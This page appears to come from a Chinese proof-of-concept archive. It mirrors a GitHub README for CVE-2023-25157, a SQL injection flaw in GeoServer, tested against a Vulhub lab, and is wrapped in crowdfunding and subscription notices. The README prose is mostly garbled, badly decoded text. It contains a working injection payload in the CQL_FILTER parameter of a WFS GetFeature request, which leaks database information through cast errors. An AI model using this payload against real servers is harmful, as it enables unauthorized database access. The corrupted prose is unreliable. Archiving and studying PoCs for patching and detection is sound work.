目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1359 元

100%

CVE-2023-25157 PoC — GeoServer SQL注入漏洞

来源
关联漏洞
标题: GeoServer SQL注入漏洞 (CVE-2023-25157)
Description:GeoServer是一个用 Java 编写的开源软件服务器。允许用户共享和编辑地理空间数据。 GeoServer 2.21.4之前、2.22.2之前版本存在安全漏洞,该漏洞源于 ``strEndsWith``、``strStartsWith`` 和 ``PropertyIsLike `` 存在滥用 问题。
介绍
��# geoserver CVE-2023-25157

> T�tǸ҇� 30� [30�] @�Ȱ�

---

github ��l� - https://github.com/custiya/geoserver-CVE-2023-25157



### ��}�� ��}�

* CVE-2023-25157�� GeoServer|��� $�Ռ��� ��ij p�t�0� �D��� �� `�լ��t�X��� �t� ���\� SQLi ��}��

* GeoServer 2.22.0 t�X�X� |ǀ� ������ ���

* WFS(Web Feature Service) �ƭ�X� CQL_FILTER|��� �|���0�� ��}�h�

* xǝ���t� t��� API�� ��� ���X��t� �l�� tǩ� ���



### Xֽ� l�1�

* docker compose up -d ���ܴ\� LѤ¸� Xֽ� �‰�

* http://your-ip:8080/geoserver \� ��t����� ȍ� ���

* <�� PostGIS p�t�0� ȥnj�� ��h�� 0�t� ���� ������t�|� h�

* VulhubX� GeoServer xǤ�4Ѥ��Ŕ� t��� PostGIS p�t�0� ȥnj�� tȬ�

    * ���� ��� tD� : vulhub

    * p�t�0� ȥnj� tDŽ� : pg

    * L�t�� tD� : example

    * ����\� ��1� : name



### poc.py

* ���� � ˆ�X� ����D� 0��<�\� sqli l�8�D� ̹� ���

* t��� l�8�D� request��ȴD� ����X��� ����� ��

* strStartsWith(name,'x'') = true

    * x ��X� '|� X՘� T� ���X�p� sql 8��� �4�

* and 1=(SELECT CAST ((SELECT version()) AS integer))

    * version() h�”� PostgreSQLX� ֬� ���D� �X�XՔ� h��t�p�, 8�����

    * CAST(... AS integer)�� ��\� ��\� ��X�X���\� $�X�� ���

    * ����� ��� T�����|� �X�XՌ� ���, Blind SQL Injection LѤ¸�� ���

```

# ��� URL

url = "http://localhost:8080/geoserver/ows"



# CQL_FILTER�� 䴴�� ���� x��X� 8����� (URL �T�)�� ����)

cql_filter = "strStartsWith(name,'x'') = true and 1=(SELECT CAST ((SELECT version()) AS integer)) -- ') = true"



# �|���0� $��

params = {

    "service": "wfs",

    "version": "1.0.0",

    "request": "GetFeature",

    "typeName": "vulhub:example",

    "CQL_FILTER": cql_filter

}

```

### ����

![Alt text](result.png)



### Ȭ�

* t��� poc|� ��t� SQLiX� ��� �ŀ�|� L�D� �� � �����. �����ǔ� SQL �Ϭ�|� ��X��� �¤�\� ����D� ���`� � ��D� �� ��.

* t��� ����D� ɹ0� �X���, ���Ɛ� ��%�� ����t� DՔ�t� ������|� \��. �\� ��%� �@� SQL l�8�D� �\� ����t�� ����XՔ� ��t� D�Ȳ|� ļij\� ȥ�X��� ����X���|� \��.
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →